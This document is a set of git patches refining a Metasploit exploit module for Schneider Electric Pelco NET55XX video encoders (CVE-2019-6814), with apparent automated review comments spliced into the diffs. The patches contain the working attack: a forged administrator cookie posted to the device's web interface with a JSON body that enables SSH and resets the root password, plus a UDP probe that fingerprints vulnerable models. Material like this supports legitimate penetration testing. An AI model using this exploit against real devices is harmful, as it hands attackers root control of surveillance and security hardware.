From: vitorespf Date: Fri, 19 Jul 2019 09:56:33 -0300 Subject: [PATCH 16/30] Update documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md Co-Authored-By: bcoles --- .../exploit/unix/http/schneider_electric_net55xx_encoder.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md index f2268675c5..394007e601 100644 --- a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md +++ b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md @@ -3,7 +3,7 @@ Schneider Electric Pelco NET55XX Encoder (CVE 2019-6814) Adding Schneider Electric Pelco NET55XX module affecting NET55XX versions (NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550). - This module exploits an inadequate access control vulnerability creating a malicious json request to`the webUI encoder, thus allowing the SSH service to be enabled and changing the root password. + This module exploits an inadequate access control vulnerability creating a malicious JSON request to the `webUI` encoder, thus allowing the SSH service to be enabled and changing the root password. ## Verification Steps From 460e83eb81c2866eab9ded79568ee73f1404212e Mon Sep 17 00:00:00 2001 From: vitorespf Date: Fri, 19 Jul 2019 09:56:51 -0300 Subject: [PATCH 17/30] Update documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md Co-Authored-By: bcoles --- .../exploit/unix/http/schneider_electric_net55xx_encoder.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md index 394007e601..8507a2db4d 100644 --- a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md 
+++ b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md @@ -21,7 +21,7 @@ This module can be as simple as setting the RHOST and NEW_PASSWORD option, and y **NEW_PASSWORD** -You should set a new ssh password to the vulnerable device. +You should set a new SSH password to the vulnerable device. ## Scenarios From 5732880db6cd48a143340d186b4d5ba9cc9856b9 Mon Sep 17 00:00:00 2001 From: vitorespf Date: Fri, 19 Jul 2019 10:08:33 -0300 Subject: [PATCH 18/30] Update documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md Co-Authored-By: bcoles --- .../exploit/unix/http/schneider_electric_net55xx_encoder.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md index 8507a2db4d..53fb4bd7dc 100644 --- a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md +++ b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md @@ -17,7 +17,7 @@ Adding Schneider Electric Pelco NET55XX module affecting NET55XX versions (NET55 ## Options -This module can be as simple as setting the RHOST and NEW_PASSWORD option, and you're ready to go. +This module can be as simple as setting the `RHOST` and `NEW_PASSWORD` option, and you're ready to go. **NEW_PASSWORD** From 68818aa4c722994afb8aeb5858248f09ef6fce09 Mon Sep 17 00:00:00 2001 From: vitorespf Date: Fri, 19 Jul 2019 10:30:05 -0300 Subject: [PATCH 19/30] Update schneider_electric_net55xx_encoder.rb --- .../schneider_electric_net55xx_encoder.rb | 36 +++++++++---------- 1 file changed, 18 insertions(+), 18 deletions(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 94533326ac..6069c279c6 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb 
+++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -61,28 +61,28 @@ class MetasploitModule < Msf::Exploit::Remote ] ) end - + def new_password datastore['NEW_PASSWORD'] end - + def check - xmlPayload = ''\ - ''\ - '
'\ - 'http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe'\ - 'uuid:f3d577a3-431f-4450-ab45-b480042b9c74'\ - ''\ - 'http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous'\ - ''\ - 'urn:schemas-xmlsoap-org:ws:2005:04:discovery'\ - '
'\ - ''\ - ''\ - 'dp0:NetworkVideoTransmitter'\ - ''\ - ''\ - '
' + xmlPayload = ''\ +''\ +'
'\ +'http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe'\ +'uuid:f3d577a3-431f-4450-ab45-b480042b9c74'\ +''\ +'http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous'\ +''\ +'urn:schemas-xmlsoap-org:ws:2005:04:discovery'\ +'
'\ +''\ +''\ +'dp0:NetworkVideoTransmitter'\ +''\ +''\ +'
' connect_udp(true, {'RPORT' => datastore['UDP_PORT']}) udp_sock.put(xmlPayload) resp = [] From f1a6c0cc45b54b4b514a936cf8388f764519d8f6 Mon Sep 17 00:00:00 2001 From: vitorespf Date: Fri, 19 Jul 2019 14:08:09 -0300 Subject: [PATCH 20/30] Update modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb Co-Authored-By: bcoles --- .../exploits/unix/http/schneider_electric_net55xx_encoder.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 6069c279c6..2b09a34e87 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -110,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "Failed to change root password") unless login && login.code == 200 print_good("#{rhost}:80 - Successfully changed the root password...") - end + end def do_login change_password From e1e89882d639f2515e078a0656e53e9a46442bec Mon Sep 17 00:00:00 2001 From: vitorespf Date: Fri, 19 Jul 2019 14:08:34 -0300 Subject: [PATCH 21/30] Update modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb Co-Authored-By: bcoles --- .../exploits/unix/http/schneider_electric_net55xx_encoder.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 2b09a34e87..c1ae4c67c1 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb 
@@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote [ OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account']), OptInt.new('TIMEOUT', [ true, 'Timeout for the requests', 10]) - ], self.class + ] ) register_advanced_options( From c0377c97c5c0d2117163fdff2cbef57945fbcb60 Mon Sep 17 00:00:00 2001 From: vitorespf Date: Fri, 19 Jul 2019 23:31:10 -0300 Subject: [PATCH 22/30] Update schneider_electric_net55xx_encoder.rb --- .../unix/http/schneider_electric_net55xx_encoder.rb | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index c1ae4c67c1..d16a0dfeb9 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -15,10 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "Schneider Electric Pelco Endura NET55XX Encoder", 'Description' => %q{ - This module exploits an inadequate access control vulnerability creating a malicious - json request to the webUI encoder, thus allowing the SSH service to be enabled , and - changing the root password. This module has been tested sucessfully on: NET5501, - NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550 versions. + This module exploits inadequate access controls within the webUI to enable the SSH service and change the root password. + This module has been tested sucessfully on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550 versions. }, 'License' => MSF_LICENSE, 'Author' => From 836805b3cdc41dd31189e187ad9ef59621423256 Mon Sep 17 00:00:00 2001 
From: vitorespf Date: Fri, 19 Jul 2019 23:37:18 -0300 Subject: [PATCH 23/30] Update modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb Co-Authored-By: bcoles --- .../exploits/unix/http/schneider_electric_net55xx_encoder.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index d16a0dfeb9..951c6f661a 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote if xmlResponse.include?("NET5501") || xmlResponse.include?("NET5501-I") || xmlResponse.include?("NET5501-XT") || xmlResponse.include?("NET5504") || xmlResponse.include?("NET5500") || xmlResponse.include?("NET5516") || xmlResponse.include?("NET5508") return Exploit::CheckCode::Appears end - Exploit::CheckCode::Safe + CheckCode::Safe end def change_password From 3c577417942d834b9437ec7ffdc902e3d4e3a0dd Mon Sep 17 00:00:00 2001 From: vitorespf Date: Fri, 19 Jul 2019 23:38:45 -0300 Subject: [PATCH 24/30] Update schneider_electric_net55xx_encoder.rb --- .../exploits/unix/http/schneider_electric_net55xx_encoder.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 951c6f661a..d22bc235b5 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb 
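Review bot: In the `@@ -90` hunk of PATCH 23 the model test chains seven `include?` calls, and `xmlResponse.include?("NET5501")` already matches the "NET5501-I" and "NET5501-XT" responses, so two of the branches can never be the deciding one; a list reads better and drops the redundancy: `return CheckCode::Appears if %w[NET5501 NET5504 NET5500 NET5516 NET5508].any? { |model| xmlResponse.include?(model) }`. The list here names NET5508 while the description string rewritten in PATCH 22 lists NET550, so one of the two looks like a typo and should be reconciled. `xmlResponse` should be `xml_response` to follow Ruby naming. The `check` method starts outside the hunk.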
@@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote end def change_password - print_status("#{rhost}:80 - Attempt to change the root password...") + print_status("#{peer} - Attempt to change the root password...") headers = {} headers['Cookie'] = 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647' headers['Content-Type'] = 'application/json;charset=utf-8' From a70a74d480e8ed48a1ba16ef9502cd4a4ef0d215 Mon Sep 17 00:00:00 2001 From: vitorespf Date: Fri, 19 Jul 2019 23:41:31 -0300 Subject: [PATCH 25/30] Update schneider_electric_net55xx_encoder.rb --- .../exploits/unix/http/schneider_electric_net55xx_encoder.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index d22bc235b5..2662cad9e6 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "Schneider Electric Pelco Endura NET55XX Encoder", 'Description' => %q{ - This module exploits inadequate access controls within the webUI to enable the SSH service and change the root password. - This module has been tested sucessfully on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550 versions. + This module exploits inadequate access controls within the webUI to enable the SSH service and change the root password. + This module has been tested sucessfully on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550 versions. }, 'License' => MSF_LICENSE, 'Author' => From af7eba5828e593ef68c19b76f05cad87f165862f Mon Sep 17 00:00:00 2001 
From: vitorespf Date: Sat, 20 Jul 2019 00:07:24 -0300 Subject: [PATCH 26/30] Update modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb Co-Authored-By: bcoles --- .../exploits/unix/http/schneider_electric_net55xx_encoder.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 2662cad9e6..1e7a5bb18a 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ - OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account']), + OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account', Rex::Text.rand_text_alphanumeric(16)]), OptInt.new('TIMEOUT', [ true, 'Timeout for the requests', 10]) ] ) From bfa17a05b46bf37c51f78ed9ff283fd5808a1989 Mon Sep 17 00:00:00 2001 From: vitorespf Date: Sat, 20 Jul 2019 00:44:21 -0300 Subject: [PATCH 27/30] Update schneider_electric_net55xx_encoder.rb --- .../exploits/unix/http/schneider_electric_net55xx_encoder.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 1e7a5bb18a..b0307607e1 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb 
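Review bot: The `NEW_PASSWORD` option in the `@@ -46` hunk of PATCH 26 now carries a generated default, but its description still reads as if the value had to be supplied; `'New password to be set for the root account (random if unset)'` keeps the option text in step with the behaviour. The default is evaluated when `register_options` runs in `initialize`, so presumably one value is produced per module instance rather than per request — worth a short comment on that line if that is the intent. `initialize` starts and ends outside the hunk.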
@@ -14,9 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info={}) super(update_info(info, 'Name' => "Schneider Electric Pelco Endura NET55XX Encoder", - 'Description' => %q{ - This module exploits inadequate access controls within the webUI to enable the SSH service and change the root password. - This module has been tested sucessfully on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550 versions. + 'Description' => %q{This module exploits inadequate access controls within the webUI to enable the SSH service and change the root password. This module has been tested sucessfully on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550 versions. }, 'License' => MSF_LICENSE, 'Author' => @@ -108,6 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "Failed to change root password") unless login && login.code == 200 print_good("#{rhost}:80 - Successfully changed the root password...") + print_good("#{rhost}:80 - New credentials: User: root / Password: #{new_password}") end def do_login From d498eaceaf8ff18450b04785be5492e961b0e2bd Mon Sep 17 00:00:00 2001 From: vitorespf Date: Sat, 20 Jul 2019 01:17:55 -0300 Subject: [PATCH 28/30] Update modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb Co-Authored-By: bcoles --- .../exploits/unix/http/schneider_electric_net55xx_encoder.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index b0307607e1..c7040e6c27 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb 
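Review bot: The `print_good` added in the `@@ -108` hunk of PATCH 27 hard-codes `#{rhost}:80`, as does the existing `print_good` above it, while PATCH 24 already switched the `print_status` in the same method to `#{peer}`; RPORT is an option, so the log line can name a port that was never used. Both lines should read `print_good("#{peer} - ...")` so the method reports consistently. The first hunk in this commit collapses the `%q{}` description onto one very long line, which PATCH 29 later undoes. `change_password` starts outside the hunk.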
@@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote headers = {} headers['Cookie'] = 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647' headers['Content-Type'] = 'application/json;charset=utf-8' - post = "{\"enable\":true,\"passwd\":\"#{new_password}\",\"userid\":\"root\"}" + post = {"enable": true, "passwd": new_password, "userid": "root"}.to_json login = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh'), From 6a2ae1418a0d0ff45c896e42848b786cabc7318e Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Mon, 22 Jul 2019 12:24:55 -0500 Subject: [PATCH 29/30] format xml, change headers --- .../schneider_electric_net55xx_encoder.rb | 51 ++++++++++--------- 1 file changed, 28 insertions(+), 23 deletions(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index c7040e6c27..a3dc9b9248 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -14,14 +14,16 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info={}) super(update_info(info, 'Name' => "Schneider Electric Pelco Endura NET55XX Encoder", - 'Description' => %q{This module exploits inadequate access controls within the webUI to enable the SSH service and change the root password. This module has been tested sucessfully on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550 versions. - }, + 'Description' => %q( + This module exploits inadequate access controls within the webUI to enable + the SSH service and change the root password. This module has been tested successfully + on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500, NET5516, NET550 versions. + ), 'License' => MSF_LICENSE, 'Author' => [ 'Lucas Dinucci ', 'Vitor Esperança ' - ], 'References' => [ 
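Review bot: The replacement line in the `@@ -96` hunk of PATCH 28 uses quoted symbol keys, `{"enable": true, ...}`, which is an unusual spelling in Ruby; `post = { enable: true, passwd: new_password, userid: 'root' }.to_json` produces the same JSON and is the conventional form. Moving from string interpolation to `to_json` is the right fix, since it escapes whatever `NEW_PASSWORD` contains. `to_json` depends on the `json` library being loaded; PATCH 01 only requires `net/ssh/command_stream`, so presumably the framework loads it, but an explicit `require 'json'` at the top of the file would document the dependency. `change_password` starts and ends outside the hunk.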
@@ -63,22 +65,23 @@ class MetasploitModule < Msf::Exploit::Remote end def check - xmlPayload = ''\ -''\ -'
'\ -'http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe'\ -'uuid:f3d577a3-431f-4450-ab45-b480042b9c74'\ -''\ -'http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous'\ -''\ -'urn:schemas-xmlsoap-org:ws:2005:04:discovery'\ -'
'\ -''\ -''\ -'dp0:NetworkVideoTransmitter'\ -''\ -''\ -'
' + xmlPayload = ''\ + ''\ + '
'\ + 'http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe'\ + 'uuid:f3d577a3-431f-4450-ab45-b480042b9c74'\ + ''\ + 'http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous'\ + ''\ + 'urn:schemas-xmlsoap-org:ws:2005:04:discovery'\ + '
'\ + ''\ + ''\ + 'dp0:NetworkVideoTransmitter'\ + ''\ + ''\ + '
' + connect_udp(true, {'RPORT' => datastore['UDP_PORT']}) udp_sock.put(xmlPayload) resp = [] @@ -93,15 +96,17 @@ class MetasploitModule < Msf::Exploit::Remote def change_password print_status("#{peer} - Attempt to change the root password...") - headers = {} - headers['Cookie'] = 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647' - headers['Content-Type'] = 'application/json;charset=utf-8' post = {"enable": true, "passwd": new_password, "userid": "root"}.to_json + login = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh'), 'data' => post, - 'headers' => headers, + 'headers' => + { + 'Cookie' => 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647', + 'Content-Type' => 'application/json;charset=utf-8' + } }, timeout=datastore['TIMEOUT']) fail_with(Failure::UnexpectedReply, "Failed to change root password") unless login && login.code == 200 From 0293e74190108daa3da996c5abb200acacffd47b Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Mon, 22 Jul 2019 12:28:47 -0500 Subject: [PATCH 30/30] remove extra lines --- .../exploit/unix/http/schneider_electric_net55xx_encoder.md | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md index 53fb4bd7dc..c01021f1cb 100644 --- a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md +++ b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md 
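Review bot: In the `@@ -93` hunk of PATCH 29 the call still ends with `}, timeout=datastore['TIMEOUT'])`, which assigns a throwaway local and passes it as the second positional argument while reading like a keyword argument; `}, datastore['TIMEOUT'])` is what is actually meant. The guard on the next line, `login && login.code == 200`, can be `login&.code == 200` if the framework's Ruby baseline permits safe navigation. In the `@@ -63` hunk the probe is still built from backslash-continued single-quoted literals under the camelCase name `xmlPayload`; a `xml_payload = <<~XML` heredoc would keep the document readable and follow Ruby naming. Both `check` and `change_password` continue outside their hunks.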
@@ -3,12 +3,12 @@ Schneider Electric Pelco NET55XX Encoder (CVE 2019-6814) Adding Schneider Electric Pelco NET55XX module affecting NET55XX versions (NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550). - This module exploits an inadequate access control vulnerability creating a malicious JSON request to the `webUI` encoder, thus allowing the SSH service to be enabled and changing the root password. +This module exploits an inadequate access control vulnerability creating a malicious JSON request to the `webUI` encoder, thus allowing the SSH service to be enabled and changing the root password. ## Verification Steps - [ ] Start `msfconsole` -- [ ] `use use exploit/linux/http/schneider_electric_net55xx_encoder` +- [ ] `use exploit/linux/http/schneider_electric_net55xx_encoder` - [ ] `set RHOSTS [rhosts]` - [ ] `set RPORT [rport]` - [ ] `set NEW_PASSWORD [new password]` @@ -23,7 +23,6 @@ This module can be as simple as setting the `RHOST` and `NEW_PASSWORD` option, a You should set a new SSH password to the vulnerable device. - ## Scenarios **Schneider Electric Pelco Encoder NET5501-XT**